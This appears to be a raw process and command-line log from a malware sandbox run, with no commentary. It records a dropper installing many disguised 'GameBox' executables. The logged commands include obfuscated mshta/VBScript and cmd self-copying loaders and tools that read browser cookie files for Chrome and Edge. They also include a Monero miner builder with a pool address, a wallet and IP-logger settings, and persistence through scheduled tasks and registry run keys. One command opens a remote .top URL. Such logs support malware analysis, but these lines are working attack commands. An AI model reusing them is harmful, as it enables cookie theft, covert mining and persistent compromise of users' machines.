"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\6w8pXrjYGBv_496W2DScTPB5.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\6w8pXrjYGBv_496W2DScTPB5.exe" ) do taskkill -im "%~NXj" -f
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Users\Admin\Documents\HUU_BBwFffdwtjU3aaYogmcF.exe
C:\Users\Admin\Documents\HUU_BBwFffdwtjU3aaYogmcF.exe
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\is-1MG4N.tmp\Stats.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1MG4N.tmp\Stats.tmp" /SL5="$404B8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-Q58R4.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q58R4.tmp\Inlog.tmp" /SL5="$2047A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-944N2.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-944N2.tmp\WEATHER Manager.tmp" /SL5="$1057E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3840 -ip 3840
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1936 -ip 1936
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Users\Admin\AppData\Local\Temp\is-L6FAD.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L6FAD.tmp\MediaBurner2.tmp" /SL5="$10588,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 296
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Users\Admin\AppData\Local\Temp\is-B20O3.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B20O3.tmp\VPN.tmp" /SL5="$204BE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3596 -ip 3596
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "6w8pXrjYGBv_496W2DScTPB5.exe" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 280
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5432 -ip 5432
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1196 -ip 1196
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Users\Admin\AppData\Local\Temp\AB16.exe
C:\Users\Admin\AppData\Local\Temp\AB16.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 272
C:\Users\Admin\AppData\Local\Temp\is-KHGQJ.tmp\ultradumnibour.exe
"C:\Users\Admin\AppData\Local\Temp\is-KHGQJ.tmp\ultradumnibour.exe" /S /UID=burnerch2
C:\Users\Admin\AppData\Local\Temp\is-FCAGE.tmp\builder.exe
"C:\Users\Admin\AppData\Local\Temp\is-FCAGE.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1384 -ip 1384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 812
C:\Users\Admin\AppData\Local\Temp\B603.exe
C:\Users\Admin\AppData\Local\Temp\B603.exe
C:\Users\Admin\AppData\Local\Temp\tmpA029_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpA029_tmp.exe"
C:\Users\Admin\AppData\Roaming\4966555.exe
"C:\Users\Admin\AppData\Roaming\4966555.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\3771582.exe
"C:\Users\Admin\AppData\Roaming\3771582.exe"
C:\Users\Admin\AppData\Roaming\3187303.exe
"C:\Users\Admin\AppData\Roaming\3187303.exe"
C:\Users\Admin\AppData\Local\Temp\is-M3SAO.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-M3SAO.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Users\Admin\AppData\Roaming\6868748.exe
"C:\Users\Admin\AppData\Roaming\6868748.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Roaming\4277866.exe
"C:\Users\Admin\AppData\Roaming\4277866.exe"
C:\Users\Admin\AppData\Local\Temp\CC8A.exe
C:\Users\Admin\AppData\Local\Temp\CC8A.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4796 -ip 4796
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\D1AC.exe
C:\Users\Admin\AppData\Local\Temp\D1AC.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 280
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 676 -p 3176 -ip 3176
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 185E16A589423C4510D7A3E06C7A0799 C
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3176 -s 2356
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 3068 -ip 3068
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Users\Admin\AppData\Local\Temp\is-ET58Q.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-ET58Q.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 2404
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp" /SL5="$30634,17345880,721408,C:\Users\Admin\AppData\Local\Temp\is-ET58Q.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-8CVR2.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe
"C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6224 -ip 6224
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6224 -s 300
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-8CVR2.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Users\Admin\Documents\Nd_tCvBxyCqjxaKpTy7uzCrF.exe
"C:\Users\Admin\Documents\Nd_tCvBxyCqjxaKpTy7uzCrF.exe"
C:\Users\Admin\Documents\Q6X63W4DaxWwu8nlhr_IKmLa.exe
"C:\Users\Admin\Documents\Q6X63W4DaxWwu8nlhr_IKmLa.exe"
C:\Users\Admin\Documents\QvnNIL5ksevghLY9sId6enK4.exe
"C:\Users\Admin\Documents\QvnNIL5ksevghLY9sId6enK4.exe"
C:\Users\Admin\Documents\w6B3UjThhNDqEtthqxJ3svMb.exe
"C:\Users\Admin\Documents\w6B3UjThhNDqEtthqxJ3svMb.exe"
C:\Users\Admin\Documents\SVzPjmmtaOBGm0pqcQuZdnkT.exe
"C:\Users\Admin\Documents\SVzPjmmtaOBGm0pqcQuZdnkT.exe"
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Users\Admin\Documents\yWQYlqeOPh4GXxK1EXLWj9CZ.exe
"C:\Users\Admin\Documents\yWQYlqeOPh4GXxK1EXLWj9CZ.exe"
C:\Users\Admin\Documents\1FmfLH5Ur6FIDBTOHluWSgeX.exe
"C:\Users\Admin\Documents\1FmfLH5Ur6FIDBTOHluWSgeX.exe"
C:\Users\Admin\Documents\9MkYFncrckrEGJHHfWF5Sd_v.exe
"C:\Users\Admin\Documents\9MkYFncrckrEGJHHfWF5Sd_v.exe"
C:\Users\Admin\Documents\qfQuJDWI8e2iMeWnRendOuGg.exe
"C:\Users\Admin\Documents\qfQuJDWI8e2iMeWnRendOuGg.exe"
C:\Users\Admin\Documents\dnR4Dsm6tzLaz7X7Zl6o7ZVh.exe
"C:\Users\Admin\Documents\dnR4Dsm6tzLaz7X7Zl6o7ZVh.exe"
C:\Users\Admin\Documents\vvjo3To3McmuJURKyokLlMkX.exe
"C:\Users\Admin\Documents\vvjo3To3McmuJURKyokLlMkX.exe"
C:\Users\Admin\Documents\5PHrHdXy1yfC_ps2WN1SOALf.exe
"C:\Users\Admin\Documents\5PHrHdXy1yfC_ps2WN1SOALf.exe"
C:\Users\Admin\Documents\JwbLVpobsEhX2A92obT90Pyb.exe
"C:\Users\Admin\Documents\JwbLVpobsEhX2A92obT90Pyb.exe"
C:\Users\Admin\Documents\agfexAnKA1oUxycqOGAUxLYF.exe
"C:\Users\Admin\Documents\agfexAnKA1oUxycqOGAUxLYF.exe"
C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe
"C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe"
C:\Users\Admin\Documents\sDbLsfKmNulpdFRqs28XqruC.exe
"C:\Users\Admin\Documents\sDbLsfKmNulpdFRqs28XqruC.exe"
C:\Users\Admin\Documents\YUs9jX1IbniC2KRM5sKUM1tM.exe
"C:\Users\Admin\Documents\YUs9jX1IbniC2KRM5sKUM1tM.exe"
C:\Users\Admin\Documents\opZdg0g1v18HkIOYEqOXDcuo.exe
"C:\Users\Admin\Documents\opZdg0g1v18HkIOYEqOXDcuo.exe"
C:\Users\Admin\Documents\CdAl2BZjIMY0zjhqueqmQYcf.exe
"C:\Users\Admin\Documents\CdAl2BZjIMY0zjhqueqmQYcf.exe"
C:\Users\Admin\Documents\JBwSO_lKNHr81ujmyBdTFXwH.exe
"C:\Users\Admin\Documents\JBwSO_lKNHr81ujmyBdTFXwH.exe"
C:\Users\Admin\AppData\Local\Temp\1EA4.exe
C:\Users\Admin\AppData\Local\Temp\1EA4.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\5c436eadc6\
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Users\Admin\Documents\BDIwGCewawmAhFUuNg_oKIve.exe
"C:\Users\Admin\Documents\BDIwGCewawmAhFUuNg_oKIve.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 279FFDE479372B911766C46CDB544E8E C
C:\Users\Admin\Documents\wIcE002YY2ayjKvpQQyfkG1Z.exe
"C:\Users\Admin\Documents\wIcE002YY2ayjKvpQQyfkG1Z.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F
C:\Users\Admin\AppData\Local\Temp\is-FNKOP.tmp\wIcE002YY2ayjKvpQQyfkG1Z.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FNKOP.tmp\wIcE002YY2ayjKvpQQyfkG1Z.tmp" /SL5="$20404,138429,56832,C:\Users\Admin\Documents\wIcE002YY2ayjKvpQQyfkG1Z.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\vvjo3To3McmuJURKyokLlMkX.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\vvjo3To3McmuJURKyokLlMkX.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\Documents\T6BHTnG0hauRPpfec2b3oW31.exe
"C:\Users\Admin\Documents\T6BHTnG0hauRPpfec2b3oW31.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 592 -p 6040 -ip 6040
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\3287.bat C:\Users\Admin\Documents\9MkYFncrckrEGJHHfWF5Sd_v.exe"
C:\Users\Admin\Documents\sDbLsfKmNulpdFRqs28XqruC.exe
"C:\Users\Admin\Documents\sDbLsfKmNulpdFRqs28XqruC.exe"
C:\Users\Admin\AppData\Local\Temp\39FD.exe
C:\Users\Admin\AppData\Local\Temp\39FD.exe
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E6F38E0E962E1FD2806B177870B624EA
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 432 -ip 432
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6040 -s 2316
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 7592 -ip 7592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 276
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\Documents\CdAl2BZjIMY0zjhqueqmQYcf.exe
C:\Users\Admin\Documents\CdAl2BZjIMY0zjhqueqmQYcf.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\vvjo3To3McmuJURKyokLlMkX.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\vvjo3To3McmuJURKyokLlMkX.exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\Documents\zmyJsBQVTyKAKlzE6Zk93Aiu.exe
"C:\Users\Admin\Documents\zmyJsBQVTyKAKlzE6Zk93Aiu.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\5c436eadc6\
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 316
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 7824 -ip 7824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7592 -s 280
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 7972 -ip 7972
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4772 -ip 4772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5900 -ip 5900
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "vvjo3To3McmuJURKyokLlMkX.exe" -f
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-M3SAO.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-M3SAO.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Roaming\2310645.exe
"C:\Users\Admin\AppData\Roaming\2310645.exe"
C:\Users\Admin\AppData\Local\Temp\is-KEPIN.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-KEPIN.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\Documents\JBwSO_lKNHr81ujmyBdTFXwH.exe
"C:\Users\Admin\Documents\JBwSO_lKNHr81ujmyBdTFXwH.exe" -q
C:\Users\Admin\AppData\Roaming\1037051.exe
"C:\Users\Admin\AppData\Roaming\1037051.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2580 -ip 2580
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Roaming\4911106.exe
"C:\Users\Admin\AppData\Roaming\4911106.exe"
C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp" /SL5="$20708,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-KEPIN.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Roaming\1151040.exe
"C:\Users\Admin\AppData\Roaming\1151040.exe"
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Program Files\Windows NT\HIGDTFAAJD\ultramediaburner.exe
"C:\Program Files\Windows NT\HIGDTFAAJD\ultramediaburner.exe" /VERYSILENT
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
C:\Users\Admin\AppData\Local\Temp\is-8CVR2.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-8CVR2.tmp\{app}\vdi_compiler"
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\is-O6RF9.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O6RF9.tmp\ultramediaburner.tmp" /SL5="$207B6,281924,62464,C:\Program Files\Windows NT\HIGDTFAAJD\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\75-133fe-5d1-af395-88462b1a2a6a8\Xykydakaero.exe
"C:\Users\Admin\AppData\Local\Temp\75-133fe-5d1-af395-88462b1a2a6a8\Xykydakaero.exe"
C:\Users\Admin\AppData\Local\Temp\bf-43bff-fe0-828a7-de9d2d2d0cda3\Bivaegeneki.exe
"C:\Users\Admin\AppData\Local\Temp\bf-43bff-fe0-828a7-de9d2d2d0cda3\Bivaegeneki.exe"
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
